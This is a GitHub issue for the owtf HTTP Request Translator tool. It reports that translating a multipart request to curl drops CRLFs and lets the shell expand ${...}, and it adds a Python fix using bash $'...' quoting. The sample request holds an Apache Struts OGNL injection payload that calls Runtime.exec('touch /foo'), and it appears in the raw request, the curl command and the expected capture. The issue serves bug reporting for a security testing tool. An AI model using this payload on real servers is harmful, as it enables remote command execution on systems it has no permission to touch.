owtf / http-request-translator

HTTP Request Translator (hrt) translates raw HTTP requests to different scripts (bash, python, etc.)
BSD 3-Clause "New" or "Revised" License
17 stars 17 forks

Fails with multipart request. #63

Open ajinabraham opened 6 years ago

ajinabraham commented 6 years ago

Raw request

b'POST /tslwebapp/example/HelloWorld.action HTTP/1.1\r\nHost: 10.28.194.39:8080\r\nContent-Type: multipart/form-data; boundary=--------429242435\r\nContent-Length: 224\r\n\r\n----------429242435\r\nContent-Disposition: form-data; name="${#_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec(\'touch /foo\')}=1"\r\n\r\n----------429242435--'

Request CURL translated by HRT

#!/usr/bin/env bash
curl --data "----------429242435Content-Disposition: form-data; name=\"${#_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec('touch /foo')}=1\"----------429242435--"  -v --request POST http://172.16.244.210:8000/tslwebapp/example/HelloWorld.action  --header "Host: 172.16.244.210:8000"  --header "Content-Type: multipart/form-data; boundary=--------429242435"  --header "Content-Length: 224"  --include

Intercepted at proxy

POST /tslwebapp/example/HelloWorld.action HTTP/1.1
Host: 172.16.244.210:8000
User-Agent: curl/7.54.0
Accept: */*
Content-Type: multipart/form-data; boundary=--------429242435
Content-Length: 82
Connection: close

----------429242435Content-Disposition: form-data; name="0=1"----------429242435--

What it should look like

POST /tslwebapp/example/HelloWorld.action HTTP/1.1
Host: 172.16.244.210:8000
User-Agent: curl/7.54.0
Accept: */*
Content-Type :multipart/form-data; boundary=--------429242435
Content-Length: 224
Content-Type: application/x-www-form-urlencoded
Connection: close

----------429242435
Content-Disposition: form-data; name="${#_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('touch /foor')}=1"

----------429242435--
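
Added example, not part of the issue report or of hrt's own code: the translated command above drops the CRLFs of the multipart body and places it in double quotes, where the shell treats `${...}` as a parameter expansion (the proxy capture shows name="0=1"). One way to emit the body so bash passes it byte for byte is ANSI-C `$'...'` quoting combined with curl's `--data-binary`. The sample request and the names split_raw_request, ansi_c_quote and to_curl are constructed for illustration.

```python
# Constructed sample: a multipart body whose field name contains ${...} and a quote.
SAMPLE = (b'POST /upload HTTP/1.1\r\nHost: app.example.test:8080\r\n'
          b'Content-Type: multipart/form-data; boundary=XBOUNDARY\r\n'
          b'Content-Length: 83\r\n\r\n'
          b'--XBOUNDARY\r\nContent-Disposition: form-data; name="${HOME}\'s"\r\n'
          b'\r\nv\r\n--XBOUNDARY--\r\n')

# Bytes that need an escape inside a bash $'...' literal.
_ESC = {0x5c: "\\\\", 0x27: "\\'", 0x0d: "\\r", 0x0a: "\\n", 0x09: "\\t"}


def ansi_c_quote(data: bytes) -> str:
    """Return a bash $'...' literal: no $, ` or ! expansion, CR/LF kept as escapes."""
    if b"\x00" in data:
        raise ValueError("NUL cannot be passed in a shell argument")
    return "$'" + "".join(
        _ESC.get(b) or (chr(b) if 0x20 <= b < 0x7f else "\\x%02x" % b)
        for b in data) + "'"


def split_raw_request(raw: bytes):
    """Split a raw request into method, target, header list and untouched body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = [(k.strip(), v.strip())
               for k, v in (h.split(":", 1) for h in lines[1:])]
    return method, target, headers, body


def to_curl(raw: bytes, scheme: str = "http") -> str:
    method, target, headers, body = split_raw_request(raw)
    host = {k.lower(): v for k, v in headers}["host"]
    parts = ["curl", "--include", "--request", ansi_c_quote(method.encode())]
    for name, value in headers:
        if name.lower() == "content-length":
            continue  # let curl compute it from the bytes actually sent
        parts += ["--header", ansi_c_quote(f"{name}: {value}".encode("iso-8859-1"))]
    if body:
        if body.startswith(b"@"):
            raise ValueError("--data-binary would read a leading @ as a file name")
        parts += ["--data-binary", ansi_c_quote(body)]
    parts.append(ansi_c_quote(f"{scheme}://{host}{target}".encode()))
    return " ".join(parts)


if __name__ == "__main__":
    print(to_curl(SAMPLE))
```

Dropping the copied Content-Length keeps the header consistent with the body curl really sends, which is the mismatch visible between the 224 in the raw request and the 82 seen at the proxy.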

viyatb commented 6 years ago

@ajinabraham thanks for the report! Let me investigate this and get back over the weekend :)